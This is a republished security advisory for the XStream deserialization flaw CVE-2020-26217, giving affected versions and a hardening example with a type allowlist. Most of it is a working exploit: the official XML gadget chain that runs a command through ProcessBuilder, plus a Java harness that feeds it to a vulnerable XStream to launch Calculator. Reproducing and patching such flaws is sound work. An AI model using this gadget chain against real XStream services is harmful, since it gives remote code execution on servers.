XStream Remote Code Execution High-Severity Vulnerability (CVE-2020-26217)

admin, 2020-11-16 20:52:32, 85 views
Vulnerability description

XStream is a widely used Java library for converting between Java objects and XML. On 16 November 2020, the XStream project released a security update fixing a remote code execution vulnerability in XStream (CVE-2020-26217). By crafting a malicious XML document, an attacker can bypass XStream's blacklist and trigger deserialization, leading to remote code execution and control of the server.


CVE ID

CVE-2020-26217


CVSS score / severity

8.5 / High


Affected versions

XStream < 1.4.14


Vulnerability PoC

The XStream project has published the PoC itself; reference: http://x-stream.github.io/CVE-2020-26217.html

```xml
<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
        <dataHandler>
          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
            <contentType>text/plain</contentType>
            <is class='java.io.SequenceInputStream'>
              <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
                <iterator class='javax.imageio.spi.FilterIterator'>
                  <iter class='java.util.ArrayList$Itr'>
                    <cursor>0</cursor>
                    <lastRet>-1</lastRet>
                    <expectedModCount>1</expectedModCount>
                    <outer-class>
                      <java.lang.ProcessBuilder>
                        <command>
                          <string>calc</string>
                        </command>
                      </java.lang.ProcessBuilder>
                    </outer-class>
                  </iter>
                  <filter class='javax.imageio.ImageIO$ContainsFilter'>
                    <method>
                      <class>java.lang.ProcessBuilder</class>
                      <name>start</name>
                      <parameter-types/>
                    </method>
                    <name>start</name>
                  </filter>
                  <next/>
                </iterator>
                <type>KEYS</type>
              </e>
              <in class='java.io.ByteArrayInputStream'>
                <buf></buf>
                <pos>0</pos>
                <mark>0</mark>
                <count>0</count>
              </in>
            </is>
            <consumed>false</consumed>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <string>test</string>
  </entry>
</map>
```
Reproduction

  1. Create a Maven project in your IDE and add the following dependency to pom.xml:

```xml
<dependency>
  <groupId>com.thoughtworks.xstream</groupId>
  <artifactId>xstream</artifactId>
  <version>1.4.13</version>
</dependency>
```

Then reload the project; Maven downloads and installs the matching XStream version automatically.

  2. Create the following PoC code:

```java
import com.thoughtworks.xstream.XStream;
import java.io.IOException;

public class CVE_2020_26217 {
    public static void main(String[] args) throws IOException {
        // XStream 1.4.13 with its default, blacklist-based security setup
        XStream xStream = new XStream();
        // The official PoC document; the command here opens the macOS calculator
        String payload = "<map>\n" +
            "  <entry>\n" +
            "    <jdk.nashorn.internal.objects.NativeString>\n" +
            "      <flags>0</flags>\n" +
            "      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n" +
            "        <dataHandler>\n" +
            "          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\n" +
            "            <contentType>text/plain</contentType>\n" +
            "            <is class='java.io.SequenceInputStream'>\n" +
            "              <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>\n" +
            "                <iterator class='javax.imageio.spi.FilterIterator'>\n" +
            "                  <iter class='java.util.ArrayList$Itr'>\n" +
            "                    <cursor>0</cursor>\n" +
            "                    <lastRet>-1</lastRet>\n" +
            "                    <expectedModCount>1</expectedModCount>\n" +
            "                    <outer-class>\n" +
            "                      <java.lang.ProcessBuilder>\n" +
            "                        <command>\n" +
            "                          <string>open</string>\n" +
            "                          <string>-a</string>\n" +
            "                          <string>Calculator</string>\n" +
            "                        </command>\n" +
            "                      </java.lang.ProcessBuilder>\n" +
            "                    </outer-class>\n" +
            "                  </iter>\n" +
            "                  <filter class='javax.imageio.ImageIO$ContainsFilter'>\n" +
            "                    <method>\n" +
            "                      <class>java.lang.ProcessBuilder</class>\n" +
            "                      <name>start</name>\n" +
            "                      <parameter-types/>\n" +
            "                    </method>\n" +
            "                    <name>start</name>\n" +
            "                  </filter>\n" +
            "                  <next/>\n" +
            "                </iterator>\n" +
            "                <type>KEYS</type>\n" +
            "              </e>\n" +
            "              <in class='java.io.ByteArrayInputStream'>\n" +
            "                <buf></buf>\n" +
            "                <pos>0</pos>\n" +
            "                <mark>0</mark>\n" +
            "                <count>0</count>\n" +
            "              </in>\n" +
            "            </is>\n" +
            "            <consumed>false</consumed>\n" +
            "          </dataSource>\n" +
            "          <transferFlavors/>\n" +
            "        </dataHandler>\n" +
            "        <dataLen>0</dataLen>\n" +
            "      </value>\n" +
            "    </jdk.nashorn.internal.objects.NativeString>\n" +
            "    <string>test</string>\n" +
            "  </entry>\n" +
            "</map>\n";
        // Deserializing the untrusted document walks the gadget chain and runs the command
        xStream.fromXML(payload);
    }
}
```

Compile and run.
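As an added hardening example (not from the original post and not XStream project code), the following configures XStream 1.4.x with a deny-all policy plus an explicit type allowlist, so an untrusted document naming any class outside that list, including the outer <map> of the PoC above, is refused before a converter instantiates it. The Order type, the parseOrder helper and the two sample documents are hypothetical.

```java
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.XStreamException;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;

public class SafeXStreamConfig {
    /** Hypothetical application type: the only object this endpoint should accept. */
    public static class Order {
        public String id;
        public int quantity;
    }

    /** Deny-all XStream instance with an explicit allowlist of types. */
    public static XStream hardened() {
        XStream xs = new XStream();
        // NONE resets the default blacklist-based permissions of 1.4.x: deny everything first.
        xs.addPermission(NoTypePermission.NONE);
        xs.addPermission(NullPermission.NULL);
        xs.addPermission(PrimitiveTypePermission.PRIMITIVES);
        // Allowlist exactly the types this endpoint needs; no JDK-package wildcards.
        xs.allowTypes(new Class[] { String.class, Order.class });
        xs.alias("order", Order.class);
        return xs;
    }

    /** Parses an Order, or returns null when XStream rejects a type in the document. */
    public static Order parseOrder(String untrustedXml) {
        try {
            return (Order) hardened().fromXML(untrustedXml);
        } catch (XStreamException e) {
            // ForbiddenClassException (possibly wrapped in a ConversionException) is raised
            // on the first element naming a non-allowlisted class, before any object exists.
            System.err.println("rejected untrusted XML: " + e.getMessage());
            return null;
        }
    }

    public static void main(String[] args) {
        // Constructed benign document: parses normally.
        Order ok = parseOrder("<order><id>A-1</id><quantity>2</quantity></order>");
        System.out.println("parsed order " + ok.id + " x" + ok.quantity);
        // Constructed probe with the PoC's outer structure: <map> resolves to
        // java.util.HashMap, which is not allowlisted, so parsing is refused.
        String probe = "<map><entry><jdk.nashorn.internal.objects.NativeString/>"
            + "<string>test</string></entry></map>";
        System.out.println("probe accepted: " + (parseOrder(probe) != null));
    }
}
```

Upgrading to 1.4.14 closes this specific chain, but the allowlist is what stops the next one. The PoC's gadget classes (jdk.nashorn.*, com.sun.xml.internal.*) are JDK-internal and no longer shipped by later JDK releases, so a failed reproduction on a modern JDK says nothing about whether the XStream version in use is safe.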

This article was first published on the WeChat public account 锋刃科技: XStream Remote Code Execution High-Severity Vulnerability (CVE-2020-26217)

Republished by CN-SEC (with thanks to the original author); please keep the original link when reposting: https://cn-sec.com/archives/186168.html
